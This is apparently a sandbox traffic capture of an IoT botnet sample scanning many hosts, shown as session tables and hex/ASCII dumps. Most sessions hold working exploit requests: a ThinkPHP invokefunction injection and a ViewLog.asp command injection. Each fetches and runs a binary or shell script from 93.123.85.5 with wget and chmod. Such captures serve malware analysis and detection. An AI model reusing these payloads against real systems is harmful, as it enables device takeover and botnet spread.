                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1031192.168.2.2339830112.17.49.10680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:41.802654982 CET20047OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:42.229005098 CET20125INHTTP/1.1 404 Not Found
                                                              Content-Length: 0
                                                              X-NWS-LOG-UUID: 14892254304440636894
                                                              Connection: close
                                                              Server: Lego Server
                                                              Date: Mon, 13 Nov 2023 21:20:42 GMT
                                                              X-Cache-Lookup: Return Directly
                                                              Nov 13, 2023 22:20:42.444032907 CET20127INData Raw: 0d
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1032192.168.2.234505095.100.59.14880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:43.111825943 CET20224OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:43.416873932 CET20233INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 257
                                                              Expires: Mon, 13 Nov 2023 21:20:43 GMT
                                                              Date: Mon, 13 Nov 2023 21:20:43 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 36 66 39 30 61 31 37 26 23 34 36 3b 31 36 39 39 39 31 30 34 34 33 26 23 34 36 3b 33 62 35 30 61 36 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;36f90a17&#46;1699910443&#46;3b50a63</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1033192.168.2.235650895.217.209.16480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:43.116852045 CET20224OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:43.426124096 CET20235INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:20:43 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1034192.168.2.235641095.67.21.15480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:43.140705109 CET20226OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:43.471421003 CET20236INHTTP/1.1 400 Bad Request
                                                              Server: nginx/1.14.2
                                                              Date: Mon, 13 Nov 2023 21:20:43 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 173
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1035192.168.2.2339806112.17.49.10680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:43.169990063 CET20227OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:43.587770939 CET20240INHTTP/1.1 404 Not Found
                                                              Content-Length: 0
                                                              X-NWS-LOG-UUID: 9523076367547271349
                                                              Connection: close
                                                              Server: Lego Server
                                                              Date: Mon, 13 Nov 2023 21:20:43 GMT
                                                              X-Cache-Lookup: Return Directly
                                                              Nov 13, 2023 22:20:43.804003954 CET20275INData Raw: 0d
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1036192.168.2.234295895.101.252.25480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:43.407049894 CET20232OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:43.702286005 CET20273INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:20:43 GMT
                                                              Date: Mon, 13 Nov 2023 21:20:43 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 64 62 30 66 37 34 38 26 23 34 36 3b 31 36 39 39 39 31 30 34 34 33 26 23 34 36 3b 31 35 34 30 30 38 38 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;adb0f748&#46;1699910443&#46;1540088a</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1037192.168.2.233567695.101.190.8380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:43.456787109 CET20236OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:43.773040056 CET20274INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 257
                                                              Expires: Mon, 13 Nov 2023 21:20:43 GMT
                                                              Date: Mon, 13 Nov 2023 21:20:43 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 37 30 62 31 35 30 32 26 23 34 36 3b 31 36 39 39 39 31 30 34 34 33 26 23 34 36 3b 38 38 62 32 38 65 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;270b1502&#46;1699910443&#46;88b28ef</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1038192.168.2.234202295.238.178.4780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:43.505394936 CET20238OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1039192.168.2.234745695.100.32.7780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:43.512104988 CET20239OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:44.156975985 CET20342INHTTP/1.0 302 Found
                                                              Location: https:///index.php?s=/index/
                                                              Server: BigIP
                                                              Connection: Keep-Alive
                                                              Content-Length: 0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              104192.168.2.233574085.217.207.1428080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:24.455430984 CET3071OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1040192.168.2.233506894.238.155.1358080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:44.298353910 CET20344OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:47.423557997 CET20631OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1041192.168.2.234036095.86.79.1088080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:44.966979980 CET20417OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1042192.168.2.235380431.136.86.2458080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:46.672858953 CET20592OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:47.679548025 CET20633OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:49.665383101 CET20673OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:53.822720051 CET20683OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:01.757762909 CET20695OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:17.627604008 CET20712OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1043192.168.2.234402694.187.111.648080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:46.679150105 CET20593OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1044192.168.2.235177094.122.122.148080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:46.684170008 CET20593OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1045192.168.2.235795031.33.9.1348080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:47.302773952 CET20626OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:48.191400051 CET20661OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:49.983169079 CET20675OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1046192.168.2.235756062.204.163.2048080
                                                              TimestampkBytes transferredDirectionData
